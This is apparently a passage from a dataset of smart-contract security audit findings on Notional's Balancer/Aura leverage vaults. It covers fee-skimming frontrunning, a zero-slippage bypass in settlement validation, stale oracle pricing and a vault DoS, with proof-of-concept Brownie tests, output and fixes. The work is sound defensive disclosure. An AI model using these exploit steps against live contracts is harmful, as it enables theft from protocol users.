0, depositAmount, primaryBorrowAmount, accounts[0])\\n chain.sleep(3600 * 24 * 365)\\n chain.mine()\\n feeReceiver = vault.getStrategyContext()[""baseStrategy""][""feeReceiver""]\\n feePercentage = vault.getStrategyContext()[""baseStrategy""][""vaultSettings""][""feePercentage""] / 1e2\\n assert env.tokens[""BAL""].balanceOf(vault.address) == 0\\n assert env.tokens[""AURA""].balanceOf(vault.address) == 0\\n assert env.tokens[""BAL""].balanceOf(feeReceiver) == 0\\n assert env.tokens[""AURA""].balanceOf(feeReceiver) == 0\\n\\n vault.claimRewardTokens({""from"": accounts[1]})\\n\\n # Test that the fee receiver received portion of the rewards as fee\\n assert env.tokens[""BAL""].balanceOf(feeReceiver) > 0\\n assert env.tokens[""AURA""].balanceOf(feeReceiver) > 0\\n\\ndef test_claim_rewards_success_frontrun(StratStableETHstETH):\\n (env, vault) = StratStableETHstETH\\n primaryBorrowAmount = 100e8\\n depositAmount = 50e18\\n enterMaturity(env, vault, 1, 0, depositAmount, primaryBorrowAmount, accounts[0])\\n chain.sleep(3600 * 24 * 365)\\n chain.mine()\\n feeReceiver = vault.getStrategyContext()[""baseStrategy""][""feeReceiver""]\\n feePercentage = vault.getStrategyContext()[""baseStrategy""][""vaultSettings""][""feePercentage""] / 1e2\\n assert env.tokens[""BAL""].balanceOf(vault.address) == 0\\n assert env.tokens[""AURA""].balanceOf(vault.address) == 0\\n assert env.tokens[""BAL""].balanceOf(feeReceiver) == 0\\n assert env.tokens[""AURA""].balanceOf(feeReceiver) == 0\\n\\n auraPool = interface.IAuraRewardPool(vault.getStrategyContext()[""stakingContext""][""auraRewardPool""])\\n auraPool.getReward(vault.address, True, {""from"": accounts[5]}) # Attacker frontrun the getReward\\n vault.claimRewardTokens({""from"": accounts[1]})\\n\\n # Test that the fee receiver received nothing due the frontrunning\\n assert env.tokens[""BAL""].balanceOf(feeReceiver) == 0\\n assert env.tokens[""AURA""].balanceOf(feeReceiver) == 0\\n```\\n\\n```\\n❯ brownie test tests/balancer/rewards/test_rewards_stable_eth_steth.py --network mainnet-fork\\nBrownie v1.18.1 - Python development framework for Ethereum\\n\\n=============================================================================================== test session starts ===============================================================================================\\nplatform linux -- Python 3.8.10, pytest-6.2.5, py-1.11.0, pluggy-1.0.0\\nplugins: eth-brownie-1.18.1, hypothesis-6.27.3, forked-1.4.0, xdist-1.34.0, web3-5.27.0\\ncollected 2 items \\nAttached to local RPC client listening at '127.0.0.1:8545'// rest of code\\n\\ntests/balancer/rewards/test_rewards_stable_eth_steth.py .. [100%]\\n\\n========================================================================================== 2 passed, 1 warning in 5.72s ===========================================================================================\\n```\\n",It is recommended not to use the pre-balance and post-balance of the reward tokens when claiming reward tokens. A more robust internal accounting scheme needs to be implemented to keep track of actual reward tokens received from the pool so that the appropriate amount of the accrued reward tokens can be sent to the Notional Treasury.\\nReference\\nA similar high-risk issue was found in the past audit report,Notional Treasury will not receive a portion of the accrued reward tokens as fees. Loss of assets for Notional protocol and its governance token holders.,"```\\nFile: AuraStakingMixin.sol\\n function claimRewardTokens() external returns (uint256[] memory claimedBalances) {\\n uint16 feePercentage = BalancerVaultStorage.getStrategyVaultSettings().feePercentage;\\n IERC20[] memory rewardTokens = _rewardTokens();\\n\\n uint256 numRewardTokens = rewardTokens.length;\\n\\n claimedBalances = new uint256[](numRewardTokens);\\n for (uint256 i; i < numRewardTokens; i++) {\\n claimedBalances[i] = rewardTokens[i].balanceOf(address(this));\\n }\\n\\n AURA_REWARD_POOL.getReward(address(this), true);\\n for (uint256 i; i < numRewardTokens; i++) {\\n claimedBalances[i] = rewardTokens[i].balanceOf(address(this)) - claimedBalances[i];\\n\\n if (claimedBalances[i] > 0 && feePercentage != 0 && FEE_RECEIVER != address(0)) {\\n uint256 feeAmount = claimedBalances[i] * feePercentage / BalancerConstants.VAULT_PERCENT_BASIS;\\n rewardTokens[i].checkTransfer(FEE_RECEIVER, feeAmount);\\n claimedBalances[i] -= feeAmount;\\n }\\n }\\n\\n emit BalancerEvents.ClaimedRewardTokens(rewardTokens, claimedBalances);\\n }\\n```\\n" +Balancer Vault Will Receive Fewer Assets As The Current Design Does Not Serve The Interest Of Vault Shareholders,medium,"The current implementation of reinvesting reward function does not benefit the vault shareholders as the current design does not serve the vault shareholder's interest well. Thus, this will result in Balancer vaults receiving fewer assets.\\nThe `reinvestReward` function of the Balancer Vaults (MetaStable2TokenAuraVault and Boosted3TokenAuraVault) is permissionless and can be called by anyone. By calling `reinvestReward` function, the vault will trade the reward tokens received by the vault for tokens that are accepted by the balancer pool, and deposit them to the pool to obtain more BPT tokens for the vault shareholders. By continuously reinvesting the reward tokens into the pool, the vault shareholders will be able to lay claim to more BPT tokens per share over time.\\n```\\nFile: MetaStable2TokenAuraHelper.sol\\n function reinvestReward(\\n MetaStable2TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n```\\n\\n```\\nFile: Boosted3TokenAuraHelper.sol\\n function reinvestReward(\\n Boosted3TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external { \\n```\\n\\nThe caller of the `reinvestReward` function can specify the trading configuration such as the DEX (e.g. Uniswap, Curve) that the trade should be executed and the slippage (params.tradeParams.oracleSlippagePercent). Note that the slippage defined must be equal to or less than the `strategyContext.vaultSettings.maxRewardTradeSlippageLimitPercent` setting that is currently set to 5% within the test scripts.\\nNotional Vaults support trading in multiple DEX protocols (Curve, Balancer V2, Uniswap V2 & V3 and 0x). Since `reinvestReward` function is callable by anyone, the liquidity provider of the supported DEX protocols will want the trade to be executed on the DEX pool that they invested on. This will allow them to earn an additional transaction fee from the trade. The amount of transaction fee earned will be significant if the volume is large when there are many vaults and reward tokens to be reinvested. In addition, the caller will set the slippage to the maximum configurable threshold (e.g. 5% in this example) to maximize the profit. Therefore, this will end up having various liquidity providers front-running each other to ensure that their `reinvestReward` transaction gets executed in order to extract value.","It is recommended to implement access control on the `reinvestReward` function to ensure that this function can only be triggered by Notional who has the best interest of its vault users.\\nAlso, consider sending the `reinvestReward` transaction as a private transaction via Flashbot so that the attacker cannot perform any kind of sandwich attack on the reinvest rewards transaction.","This does not serve the vault shareholder's interest well as the caller of the `reinvestReward` function will not be trading and reinvesting in an optimal way that maximizes the value of the shareholder's assets in the vaults. There is a misalignment in the objective between the vault shareholders and callers. Therefore, the vault and its users will end up on the losing end and receive fewer assets than they should.","```\\nFile: MetaStable2TokenAuraHelper.sol\\n function reinvestReward(\\n MetaStable2TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n```\\n" +Existing Slippage Control Can Be Bypassed During Vault Settlement,medium,"The existing slippage control can be bypassed/disabled during vault settlement, thus allowing the trade to be executed without consideration of its slippage.\\nNote 1: This issue affects MetaStable2 and Boosted3 balancer leverage vaults\\nNote 2: This issue affects the following three (3) processes. However, the root cause and the remediation action are the same for all. Therefore, only the PoC for the ""Emergency vault settlement"" process will be documented in this report, and the other two processes will be omitted for brevity. Refer to ""Appendix I - Normal and Post Maturity Vault Settlement"" for more details.\\nEmergency vault settlement\\nNormal vault settlement\\nPost-Maturity vault settlement.\\nNote 3: The issue affects all the supported DEXs (Curve, Balancer V2, Uniswap V2, Uniswap V3 and 0x) within Notional\\nThe `emergencySettlementSlippageLimitPercent` of the vault is set to 10% as per the environment file provided by Notional.\\n```\\nFile: BalancerEnvironment.py\\n ""postMaturitySettlementSlippageLimitPercent"": 10e6, # 10%\\n ""emergencySettlementSlippageLimitPercent"": 10e6, # 10%\\n```\\n\\nWhen a user calls the `settleVaultEmergency` function, the vault will validate that the slippage (DynamicTradeParams.oracleSlippagePercent) defined by the caller is within the acceptable slippage range by calling `SettlementUtils._decodeParamsAndValidate` function.\\n```\\nFile: MetaStable2TokenAuraHelper.sol\\n function settleVaultEmergency(\\n MetaStable2TokenAuraStrategyContext calldata context, \\n uint256 maturity, \\n bytes calldata data\\n ) external {\\n RedeemParams memory params = SettlementUtils._decodeParamsAndValidate(\\n context.baseStrategy.vaultSettings.emergencySettlementSlippageLimitPercent,\\n data\\n );\\n\\n uint256 bptToSettle = context.baseStrategy._getEmergencySettlementParams({\\n poolContext: context.poolContext.basePool, \\n maturity: maturity, \\n totalBPTSupply: IERC20(context.poolContext.basePool.pool).totalSupply()\\n });\\n```\\n\\nThe `SettlementUtils._decodeParamsAndValidate` function will validate that the slippage (DynamicTradeParams.oracleSlippagePercent) passed in by the caller does not exceed the designated threshold (10%). In Line 41-42, the transaction will revert if the `DynamicTradeParams.oracleSlippagePercent` exceeds the `slippageLimitPercent`. Note that `slippageLimitPercent` is equal to `emergencySettlementSlippageLimitPercent` which is `10%`.\\nThere is an edge case with the condition at Line 41. Consider the following cases:\\nIf `callbackData.oracleSlippagePercent` = 9% and `slippageLimitPercent` = 10%, the condition will evaluate as `False` and transaction will not revert\\nIf `callbackData.oracleSlippagePercent` = 11% and `slippageLimitPercent` = 10%, the condition will evaluate as `True` and transaction will revert because it exceeds the designated threshold.\\nIf `callbackData.oracleSlippagePercent` = 0% and `slippageLimitPercent` = 10%, the condition will evaluate as `False` and transaction will not revert\\nThe problem is that when `callbackData.oracleSlippagePercent` is `0%`, this effectively means that there is no slippage limit. This essentially exceeded the designated threshold (10%), and the transaction should revert instead, but it did not.\\n```\\nFile: SettlementUtils.sol\\n /// @notice Validates that the slippage passed in by the caller\\n /// does not exceed the designated threshold.\\n /// @param slippageLimitPercent configured limit on the slippage from the oracle price allowed\\n /// @param data trade parameters passed into settlement\\n /// @return params abi decoded redemption parameters\\n function _decodeParamsAndValidate(\\n uint32 slippageLimitPercent,\\n bytes memory data\\n ) internal view returns (RedeemParams memory params) {\\n params = abi.decode(data, (RedeemParams));\\n DynamicTradeParams memory callbackData = abi.decode(\\n params.secondaryTradeParams, (DynamicTradeParams)\\n );\\n\\n if (callbackData.oracleSlippagePercent > slippageLimitPercent) {\\n revert Errors.SlippageTooHigh(callbackData.oracleSlippagePercent, slippageLimitPercent);\\n }\\n }\\n```\\n\\nWithin `executeTradeWithDynamicSlippage` function, it will calculate the `trade.limit` by calling the `PROXY.getLimitAmount`. The `trade.limit` is the maximum amount of sellToken that can be sold OR the minimum amount of buyToken the contract is expected to receive from the DEX depending on whether you are performing a sell or buy.\\n```\\nFile: TradingModule.sol\\n function executeTradeWithDynamicSlippage(\\n uint16 dexId,\\n Trade memory trade,\\n uint32 dynamicSlippageLimit\\n ) external override returns (uint256 amountSold, uint256 amountBought) {\\n // This method calls back into the implementation via the proxy so that it has proper\\n // access to storage.\\n trade.limit = PROXY.getLimitAmount(\\n trade.tradeType,\\n trade.sellToken,\\n trade.buyToken,\\n trade.amount,\\n dynamicSlippageLimit\\n );\\n```\\n\\nWithin the `TradingUtils._getLimitAmount` function, when the `slippageLimit` is set to `0`,\\nIf it is a sell trade, the `limitAmount` will be set to `type(uint256).max`. See Line 187\\nIf it is a buy trade, the `limitAmount` will be set to `0`. See Line 207\\nThese effectively remove the slippage limit. Therefore, a malicious user can specify the `callbackData.oracleSlippagePercent` to be `0%` to bypass the slippage validation check.\\n```\\nFile: TradingUtils.sol\\n function _getLimitAmount(\\n TradeType tradeType,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n uint32 slippageLimit,\\n uint256 oraclePrice,\\n uint256 oracleDecimals\\n ) internal view returns (uint256 limitAmount) {\\n uint256 sellTokenDecimals = 10 **\\n (\\n sellToken == Deployments.ETH_ADDRESS\\n ? 18\\n : IERC20(sellToken).decimals()\\n );\\n uint256 buyTokenDecimals = 10 **\\n (\\n buyToken == Deployments.ETH_ADDRESS\\n ? 18\\n : IERC20(buyToken).decimals()\\n );\\n\\n if (tradeType == TradeType.EXACT_OUT_SINGLE || tradeType == TradeType.EXACT_OUT_BATCH) {\\n // 0 means no slippage limit\\n if (slippageLimit == 0) {\\n return type(uint256).max;\\n }\\n // For exact out trades, we need to invert the oracle price (1 / oraclePrice)\\n // We increase the precision before we divide because oraclePrice is in\\n // oracle decimals\\n oraclePrice = (oracleDecimals * oracleDecimals) / oraclePrice;\\n // For exact out trades, limitAmount is the max amount of sellToken the DEX can\\n // pull from the contract\\n limitAmount =\\n ((oraclePrice + \\n ((oraclePrice * uint256(slippageLimit)) /\\n Constants.SLIPPAGE_LIMIT_PRECISION)) * amount) / \\n oracleDecimals;\\n\\n // limitAmount is in buyToken precision after the previous calculation,\\n // convert it to sellToken precision\\n limitAmount = (limitAmount * sellTokenDecimals) / buyTokenDecimals;\\n } else {\\n // 0 means no slippage limit\\n if (slippageLimit == 0) {\\n return 0;\\n }\\n // For exact in trades, limitAmount is the min amount of buyToken the contract\\n // expects from the DEX\\n limitAmount =\\n ((oraclePrice -\\n ((oraclePrice * uint256(slippageLimit)) /\\n Constants.SLIPPAGE_LIMIT_PRECISION)) * amount) /\\n oracleDecimals;\\n\\n // limitAmount is in sellToken precision after the previous calculation,\\n // convert it to buyToken precision\\n limitAmount = (limitAmount * buyTokenDecimals) / sellTokenDecimals;\\n }\\n }\\n```\\n\\nProof-of-Concept\\nThe following test case shows that when the slippage is set to 11% (11e6), the transaction will be reverted and fails the test. This is working as intended because the slippage (11%) exceeded the threshold (emergencySettlementSlippageLimitPercent = 10%).\\n```\\ndef test_emergency_single_maturity_success(StratBoostedPoolUSDCPrimary):\\n (env, vault) = StratBoostedPoolUSDCPrimary\\n primaryBorrowAmount = 5000e8\\n depositAmount = 10000e6\\n env.tokens[""USDC""].approve(env.notional, 2 ** 256 - 1, {""from"": env.whales[""USDC""]})\\n maturity = enterMaturity(env, vault, 2, 0, depositAmount, primaryBorrowAmount, env.whales[""USDC""])\\n strategyContext = vault.getStrategyContext()\\n settings = dict(strategyContext[""baseStrategy""][""vaultSettings""].dict())\\n settings[""maxBalancerPoolShare""] = 0\\n vault.setStrategyVaultSettings(\\n list(settings.values()), \\n {""from"": env.notional.owner()}\\n )\\n # minPrimary is calculated internally for boosted pools \\n redeemParams = get_redeem_params(0, 0, \\n get_dynamic_trade_params(\\n DEX_ID[""UNISWAP_V3""], TRADE_TYPE[""EXACT_IN_SINGLE""], 11e6, True, get_univ3_single_data(3000)\\n )\\n )\\n vault.settleVaultEmergency(maturity, redeemParams, {""from"": env.notional.owner()})\\n vaultState = env.notional.getVaultState(vault.address, maturity)\\n assert vaultState[""totalStrategyTokens""] == 0\\n```\\n\\n```\\n❯ brownie test tests/balancer/settlement/test_settlement_boosted_usdc.py --network mainnet-fork\\nBrownie v1.18.1 - Python development framework for Ethereum\\n\\n=============================================================================================== test session starts ===============================================================================================\\nplatform linux -- Python 3.8.10, pytest-6.2.5, py-1.11.0, pluggy-1.0.0\\nplugins: eth-brownie-1.18.1, hypothesis-6.27.3, forked-1.4.0, xdist-1.34.0, web3-5.27.0\\ncollected 1 item \\nAttached to local RPC client listening at '127.0.0.1:8545'// rest of code\\n\\ntests/balancer/settlement/test_settlement_boosted_usdc.py F [100%]\\n\\n==================================================================================================== FAILURES =====================================================================================================\\n```\\n\\nThe following test case shows that when the slippage is set to 0, the transaction does not revert and passes the test. This is not working as intended because having no slippage (0) technically exceeded the threshold (emergencySettlementSlippageLimitPercent = 10%).\\n```\\ndef test_emergency_single_maturity_success(StratBoostedPoolUSDCPrimary):\\n (env, vault) = StratBoostedPoolUSDCPrimary\\n primaryBorrowAmount = 5000e8\\n depositAmount = 10000e6\\n env.tokens[""USDC""].approve(env.notional, 2 ** 256 - 1, {""from"": env.whales[""USDC""]})\\n maturity = enterMaturity(env, vault, 2, 0, depositAmount, primaryBorrowAmount, env.whales[""USDC""])\\n strategyContext = vault.getStrategyContext()\\n settings = dict(strategyContext[""baseStrategy""][""vaultSettings""].dict())\\n settings[""maxBalancerPoolShare""] = 0\\n vault.setStrategyVaultSettings(\\n list(settings.values()), \\n {""from"": env.notional.owner()}\\n )\\n # minPrimary is calculated internally for boosted pools \\n redeemParams = get_redeem_params(0, 0, \\n get_dynamic_trade_params(\\n DEX_ID[""UNISWAP_V3""], TRADE_TYPE[""EXACT_IN_SINGLE""], 0, True, get_univ3_single_data(3000)\\n )\\n )\\n vault.settleVaultEmergency(maturity, redeemParams, {""from"": env.notional.owner()})\\n vaultState = env.notional.getVaultState(vault.address, maturity)\\n assert vaultState[""totalStrategyTokens""] == 0\\n```\\n\\n```\\n❯ brownie test tests/balancer/settlement/test_settlement_boosted_usdc.py --network mainnet-fork\\nBrownie v1.18.1 - Python development framework for Ethereum\\n\\n=============================================================================================== test session starts ===============================================================================================\\nplatform linux -- Python 3.8.10, pytest-6.2.5, py-1.11.0, pluggy-1.0.0\\nplugins: eth-brownie-1.18.1, hypothesis-6.27.3, forked-1.4.0, xdist-1.34.0, web3-5.27.0\\ncollected 1 item \\nAttached to local RPC client listening at '127.0.0.1:8545'// rest of code\\n\\ntests/balancer/settlement/test_settlement_boosted_usdc.py . [100%]\\n\\n========================================================================================== 1 passed, 1 warning in 4.31s ===========================================================================================\\n```\\n","Update the `SettlementUtils._decodeParamsAndValidate` function to revert if the slippage is set to zero.\\n```\\nFile: SettlementUtils.sol\\n /// @notice Validates that the slippage passed in by the caller\\n /// does not exceed the designated threshold.\\n /// @param slippageLimitPercent configured limit on the slippage from the oracle price allowed\\n /// @param data trade parameters passed into settlement\\n /// @return params abi decoded redemption parameters\\n function _decodeParamsAndValidate(\\n uint32 slippageLimitPercent,\\n bytes memory data\\n ) internal view returns (RedeemParams memory params) {\\n params = abi.decode(data, (RedeemParams));\\n DynamicTradeParams memory callbackData = abi.decode(\\n params.secondaryTradeParams, (DynamicTradeParams)\\n );\\n\\n// Remove the line below\\n if (callbackData.oracleSlippagePercent > slippageLimitPercent) {\\n// Add the line below\\n if (callbackData.oracleSlippagePercent == 0 || callbackData.oracleSlippagePercent > slippageLimitPercent) {\\n revert Errors.SlippageTooHigh(callbackData.oracleSlippagePercent, slippageLimitPercent);\\n }\\n }\\n```\\n\\nAppendix I - Normal and Post Maturity Vault Settlement\\nThe `settlementSlippageLimitPercent` and `postMaturitySettlementSlippageLimitPercent` of the vault are set to 5% and 10% respectively per the environment file provided by Notional.\\n```\\nFile: BalancerEnvironment.py\\n ""settlementSlippageLimitPercent"": 5e6, # 5%\\n ""postMaturitySettlementSlippageLimitPercent"": 10e6, # 10%\\n```\\n\\nWhen a user calls the `settleVaultNormal` or `settleVaultPostMaturity` function, the vault will validate that the slippage (DynamicTradeParams.oracleSlippagePercent) defined by the caller is within the acceptable slippage range by calling `SettlementUtils._decodeParamsAndValidate` function.\\n```\\nFile: MetaStable2TokenAuraVault.sol\\n function settleVaultNormal(\\n uint256 maturity,\\n uint256 strategyTokensToRedeem,\\n bytes calldata data\\n ) external {\\n if (maturity <= block.timestamp) {\\n revert Errors.PostMaturitySettlement();\\n }\\n if (block.timestamp < maturity - SETTLEMENT_PERIOD_IN_SECONDS) {\\n revert Errors.NotInSettlementWindow();\\n }\\n MetaStable2TokenAuraStrategyContext memory context = _strategyContext();\\n SettlementUtils._validateCoolDown(\\n context.baseStrategy.vaultState.lastSettlementTimestamp,\\n context.baseStrategy.vaultSettings.settlementCoolDownInMinutes\\n );\\n RedeemParams memory params = SettlementUtils._decodeParamsAndValidate(\\n context.baseStrategy.vaultSettings.settlementSlippageLimitPercent,\\n data\\n );\\n MetaStable2TokenAuraHelper.settleVault(\\n context, maturity, strategyTokensToRedeem, params\\n );\\n context.baseStrategy.vaultState.lastSettlementTimestamp = uint32(block.timestamp);\\n context.baseStrategy.vaultState.setStrategyVaultState();\\n }\\n\\n function settleVaultPostMaturity(\\n uint256 maturity,\\n uint256 strategyTokensToRedeem,\\n bytes calldata data\\n ) external onlyNotionalOwner {\\n if (block.timestamp < maturity) {\\n revert Errors.HasNotMatured();\\n }\\n MetaStable2TokenAuraStrategyContext memory context = _strategyContext();\\n SettlementUtils._validateCoolDown(\\n context.baseStrategy.vaultState.lastPostMaturitySettlementTimestamp,\\n context.baseStrategy.vaultSettings.postMaturitySettlementCoolDownInMinutes\\n );\\n RedeemParams memory params = SettlementUtils._decodeParamsAndValidate(\\n context.baseStrategy.vaultSettings.postMaturitySettlementSlippageLimitPercent,\\n data\\n );\\n MetaStable2TokenAuraHelper.settleVault(\\n context, maturity, strategyTokensToRedeem, params\\n );\\n context.baseStrategy.vaultState.lastPostMaturitySettlementTimestamp = uint32(block.timestamp); \\n context.baseStrategy.vaultState.setStrategyVaultState(); \\n }\\n```\\n\\nSince the same vulnerable `SettlementUtils._decodeParamsAndValidate` function is being used here, the `settleVaultNormal` and `settleVaultPostMaturity` functions are affected by this issue too.",Malicious users can trigger the permissionless `settleVaultEmergency` function and cause the trade to suffer huge slippage. This results in loss of assets for the vaults and their users.,"```\\nFile: BalancerEnvironment.py\\n ""postMaturitySettlementSlippageLimitPercent"": 10e6, # 10%\\n ""emergencySettlementSlippageLimitPercent"": 10e6, # 10%\\n```\\n" +Rely On Balancer Oracle Which Is Not Updated Frequently,medium,"The vault relies on Balancer Oracle which is not updated frequently.\\nNote: This issue affects the MetaStable2 balancer leverage vault\\nThe issue is that this pool only handled ~1.5 transactions per day based on the last 5 days' data. In terms of average, the price will only be updated once every 16 hours. There are also many days that there is only 1 transaction. The following shows the number of transactions for each day within the audit period.\\n5 Oct 2022 - 3 transactions\\n4 Oct 2022 - 1 transaction\\n3 Oct 2022 - 1 transaction\\n2 Oct 2022 - 2 transactions\\n1 Oct 2022 - 1 transaction\\nNote that the price will only be updated whenever a transaction (e.g. swap) within the Balancer pool is triggered. Due to the lack of updates, the price provided by Balancer Oracle will not reflect the true value of the assets. Considering the stETH/ETH Balancer pool, the price of the stETH or ETH provided will not reflect the true value in the market.\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice Gets the oracle price pair price between two tokens using a weighted\\n /// average between a chainlink oracle and the balancer TWAP oracle.\\n /// @param poolContext oracle context variables\\n /// @param oracleContext oracle context variables\\n /// @param tradingModule address of the trading module\\n /// @return oraclePairPrice oracle price for the pair in 18 decimals\\n function _getOraclePairPrice(\\n TwoTokenPoolContext memory poolContext,\\n OracleContext memory oracleContext, \\n ITradingModule tradingModule\\n ) internal view returns (uint256 oraclePairPrice) {\\n // NOTE: this balancer price is denominated in 18 decimal places\\n uint256 balancerWeightedPrice;\\n if (oracleContext.balancerOracleWeight > 0) {\\n uint256 balancerPrice = BalancerUtils._getTimeWeightedOraclePrice(\\n address(poolContext.basePool.pool),\\n IPriceOracle.Variable.PAIR_PRICE,\\n oracleContext.oracleWindowInSeconds\\n );\\n\\n if (poolContext.primaryIndex == 1) {\\n // If the primary index is the second token, we need to invert\\n // the balancer price.\\n balancerPrice = BalancerConstants.BALANCER_PRECISION_SQUARED / balancerPrice;\\n }\\n\\n balancerWeightedPrice = balancerPrice * oracleContext.balancerOracleWeight;\\n }\\n\\n uint256 chainlinkWeightedPrice;\\n if (oracleContext.balancerOracleWeight < BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION) {\\n (int256 rate, int256 decimals) = tradingModule.getOraclePrice(\\n poolContext.primaryToken, poolContext.secondaryToken\\n );\\n require(rate > 0);\\n require(decimals >= 0);\\n\\n if (uint256(decimals) != BalancerConstants.BALANCER_PRECISION) {\\n rate = (rate * int256(BalancerConstants.BALANCER_PRECISION)) / decimals;\\n }\\n\\n // No overflow in rate conversion, checked above\\n chainlinkWeightedPrice = uint256(rate) * \\n (BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION - oracleContext.balancerOracleWeight);\\n }\\n\\n oraclePairPrice = (balancerWeightedPrice + chainlinkWeightedPrice) / \\n BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION;\\n }\\n```\\n\\n```\\nFile: BalancerUtils.sol\\n function _getTimeWeightedOraclePrice(\\n address pool,\\n IPriceOracle.Variable variable,\\n uint256 secs\\n ) internal view returns (uint256) {\\n IPriceOracle.OracleAverageQuery[]\\n memory queries = new IPriceOracle.OracleAverageQuery[](1);\\n\\n queries[0].variable = variable;\\n queries[0].secs = secs;\\n queries[0].ago = 0; // now\\n\\n // Gets the balancer time weighted average price denominated in the first token\\n return IPriceOracle(pool).getTimeWeightedAverage(queries)[0];\\n }\\n```\\n","Although it is not possible to obtain a price pair that truly reflects the true value of an asset in the real world, the vault should attempt to minimize inaccuracy and slippage as much as possible. This can be done by choosing and using a more accurate Oracle that is updated more frequently instead of using the Balancer Oracle that is infrequently updated.\\nChainlink should be used as the primary Oracle for price pair. If a secondary Oracle is needed for a price pair, consider using Teller Oracle instead of Balancer Oracle. Some example of how Chainlink and Tellor works together in a live protocol can be found here\\nObtaining the time-weight average price of BTP LP token from Balancer Oracle is fine as the Balancer pool is the source of truth. However, getting the price of ETH or stETH from Balancer Oracle would not be a good option.\\nOn a side note, it was observed that the weightage of the price pair is Balancer Oracle - 60% and Chainlink - 40%. Thus, this theoretically will reduce the impact of inaccurate prices provided by Balancer Oracle by around half. However, the team should still consider using a better Oracle as almost all the functions within the vault depends on the accurate price of underlying assets to operate.\\nNote: For the stETH/ETH balancer leverage vault, the price pair is computed based on a weighted average of Balancer Oracle and Chainlink. Based on the test script, the weightage is Balancer Oracle - 60% and Chainlink - 40%.\\n```\\nFile: BalancerEnvironment.py\\n ""maxRewardTradeSlippageLimitPercent"": 5e6,\\n ""balancerOracleWeight"": 0.6e4, # 60%\\n ""settlementCoolDownInMinutes"": 60 * 6, # 6 hour settlement cooldown\\n```\\n","The price provided by the function will not reflect the true value of the assets. It might be overvalued or undervalued. The affected function is being used in almost all functions within the vault. For instance, this function is part of the critical `_convertStrategyToUnderlying` function that computes the value of the strategy token in terms of its underlying assets. As a result, it might cause the following:\\nVault Settlement - Vault settlement requires computing the underlying value of the strategy tokens. It involves dealing with a large number of assets, and thus even a slight slippage in the price will be significantly amplified.\\nDeleverage/Liquidation of Account - If the price provided does not reflect the true value, users whose debt ratio is close to the liquidation threshold might be pre-maturely deleveraged/liquidated since their total asset value might be undervalued.\\nBorrowing - If the price provided does not reflect the true value, it might be possible that the assets of some users might be overvalued, and thus they are able to over-borrow from the vault.","```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice Gets the oracle price pair price between two tokens using a weighted\\n /// average between a chainlink oracle and the balancer TWAP oracle.\\n /// @param poolContext oracle context variables\\n /// @param oracleContext oracle context variables\\n /// @param tradingModule address of the trading module\\n /// @return oraclePairPrice oracle price for the pair in 18 decimals\\n function _getOraclePairPrice(\\n TwoTokenPoolContext memory poolContext,\\n OracleContext memory oracleContext, \\n ITradingModule tradingModule\\n ) internal view returns (uint256 oraclePairPrice) {\\n // NOTE: this balancer price is denominated in 18 decimal places\\n uint256 balancerWeightedPrice;\\n if (oracleContext.balancerOracleWeight > 0) {\\n uint256 balancerPrice = BalancerUtils._getTimeWeightedOraclePrice(\\n address(poolContext.basePool.pool),\\n IPriceOracle.Variable.PAIR_PRICE,\\n oracleContext.oracleWindowInSeconds\\n );\\n\\n if (poolContext.primaryIndex == 1) {\\n // If the primary index is the second token, we need to invert\\n // the balancer price.\\n balancerPrice = BalancerConstants.BALANCER_PRECISION_SQUARED / balancerPrice;\\n }\\n\\n balancerWeightedPrice = balancerPrice * oracleContext.balancerOracleWeight;\\n }\\n\\n uint256 chainlinkWeightedPrice;\\n if (oracleContext.balancerOracleWeight < BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION) {\\n (int256 rate, int256 decimals) = tradingModule.getOraclePrice(\\n poolContext.primaryToken, poolContext.secondaryToken\\n );\\n require(rate > 0);\\n require(decimals >= 0);\\n\\n if (uint256(decimals) != BalancerConstants.BALANCER_PRECISION) {\\n rate = (rate * int256(BalancerConstants.BALANCER_PRECISION)) / decimals;\\n }\\n\\n // No overflow in rate conversion, checked above\\n chainlinkWeightedPrice = uint256(rate) * \\n (BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION - oracleContext.balancerOracleWeight);\\n }\\n\\n oraclePairPrice = (balancerWeightedPrice + chainlinkWeightedPrice) / \\n BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION;\\n }\\n```\\n" +Attackers Can DOS Balancer Vaults By Bypassing The BPT Threshold,medium,"Malicious users can lock up all the leverage vaults offered by Notional causing denial-of-service by bypassing the BPT threshold and subseqently trigger an emergency settlement against the vaults.\\nThe current BPT threshold is set to 20% of the total BTP supply based on the environment file provided during the audit.\\n```\\nFile: BalancerEnvironment.py\\n ""oracleWindowInSeconds"": 3600,\\n ""maxBalancerPoolShare"": 2e3, # 20%\\n ""settlementSlippageLimitPercent"": 5e6, # 5%\\n```\\n\\n```\\nFile: BalancerVaultStorage.sol\\n function _bptThreshold(StrategyVaultSettings memory strategyVaultSettings, uint256 totalBPTSupply) \\n internal pure returns (uint256) {\\n return (totalBPTSupply * strategyVaultSettings.maxBalancerPoolShare) / BalancerConstants.VAULT_PERCENT_BASIS;\\n }\\n```\\n\\nWhen the total number of BPT owned by the vault exceeds the BPT threshold, no one will be able to enter the vault as per the require check at Line 295-296 within the `TwoTokenPoolUtils._joinPoolAndStake` function.\\n```\\nFile: TwoTokenPoolUtils.sol\\n function _joinPoolAndStake(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n uint256 minBPT\\n ) internal returns (uint256 bptMinted) {\\n // prettier-ignore\\n PoolParams memory poolParams = poolContext._getPoolParams( \\n primaryAmount, \\n secondaryAmount,\\n true // isJoin\\n );\\n\\n bptMinted = BalancerUtils._joinPoolExactTokensIn({\\n context: poolContext.basePool,\\n params: poolParams,\\n minBPT: minBPT\\n });\\n\\n // Check BPT threshold to make sure our share of the pool is\\n // below maxBalancerPoolShare\\n uint256 bptThreshold = strategyContext.vaultSettings._bptThreshold(\\n 